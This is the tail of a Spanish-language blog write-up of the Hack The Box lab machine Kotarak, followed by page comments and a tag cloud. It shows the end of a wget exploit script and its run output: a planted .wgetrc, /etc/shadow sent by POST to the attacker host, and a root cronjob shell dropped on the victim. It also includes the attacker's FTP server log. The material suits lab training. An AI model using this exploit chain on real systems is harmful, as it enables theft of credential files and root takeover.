<span class="k">print</span> <span class="s">"Serving wget exploit on port %s...</span><span class="se">\n\n</span><span class="s">"</span> <span class="o">%</span> <span class="n">HTTP_LISTEN_PORT</span>

<span class="n">handler</span><span class="p">.</span><span class="n">serve_forever</span><span class="p">()</span>
</code></pre></div></div>
<p>Procedemos a ejecutar el exp1.py en la maquian victima</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>atanas@kotarak-dmz:/tmp<span class="nv">$ </span><span class="nb">ls
</span>exp1.py  hsperfdata_tomcat  systemd-private-3e9e26f3a6f84a9a9b909400a5690811-systemd-timesyncd.service-AdlnuJ  vmware-root
atanas@kotarak-dmz:/tmp<span class="nv">$ </span>authbind python exp1.py 
Ready? Is your FTP server running?
FTP found open on 10.10.14.12:21. Let<span class="s1">'s go then

Serving wget exploit on port 80...


We have a volunteer requesting /archive.tar.gz by GET :)

Uploading .wgetrc via ftp redirect vuln. It should land in /root 

10.0.3.133 - - [20/Jul/2021 10:46:01] "GET /archive.tar.gz HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@10.10.14.12:21/.wgetrc 

We have a volunteer requesting /archive.tar.gz by POST :)

Received POST from wget, this should be the extracted /etc/shadow file: 

---[begin]---
 950d1425795dfd38272c9XXXXXXXXXXXX   ------------ FLAG DE ROOT -------------
 
---[eof]---


Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim'</span>s host <span class="o">(</span>because of .wgetrc we injected <span class="k">in </span>the GET first response<span class="o">)</span>
10.0.3.133 - - <span class="o">[</span>20/Jul/2021 10:48:01] <span class="s2">"POST /archive.tar.gz HTTP/1.1"</span> 200 -

File was served. Check on /root/hacked-via-wget on the victim<span class="s1">'s host in a minute! :) 
</span></code></pre></div></div>
<p>Server FTP montado desde nuestro Kali para alojar el <code class="language-plaintext highlighter-rouge">.wgetrc</code> donde van las instrucciones maliciosas (EJECUTAR ESTO ANTES QUE EL EXPLOIT)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>─(root💀kali)-[/home/…/HTB/OSCP/Kotarak/exploits]
└─# python3 -m pyftpdlib -p21 -w
/usr/local/lib/python3.9/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
  warnings.warn("write permissions assigned to anonymous user.",
[I 2021-07-20 16:44:46] concurrency model: async
[I 2021-07-20 16:44:46] masquerade (NAT) address: None
[I 2021-07-20 16:44:46] passive ports: None
[I 2021-07-20 16:44:46] &gt;&gt;&gt; starting FTP server on 0.0.0.0:21, pid=6124 &lt;&lt;&lt;
[I 2021-07-20 16:45:13] 10.10.10.55:56700-[] FTP session opened (connect)
[I 2021-07-20 16:45:59] 10.10.10.55:34470-[] FTP session opened (connect)
[I 2021-07-20 16:45:59] 10.10.10.55:34470-[anonymous] USER 'anonymous' logged in.
[I 2021-07-20 16:46:00] 10.10.10.55:34470-[anonymous] RETR /home/Escritorio/HTB/OSCP/Kotarak/exploits/.wgetrc completed=1 bytes=73 seconds=0.032
[I 2021-07-20 16:46:00] 10.10.10.55:34470-[anonymous] FTP session closed (disconnect).
</code></pre></div></div>

<p>Maquina Rooteada =D</p>


</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/07/20/Kotarak.html';
     this.page.identifier = '/2021/07/20/Kotarak';
     this.page.title = 'OSCP Path ~ Kotarak de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'Writeup de la maquina de HackTheBox llamada KOTARAK siguiendo el PATH para el OSCP';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
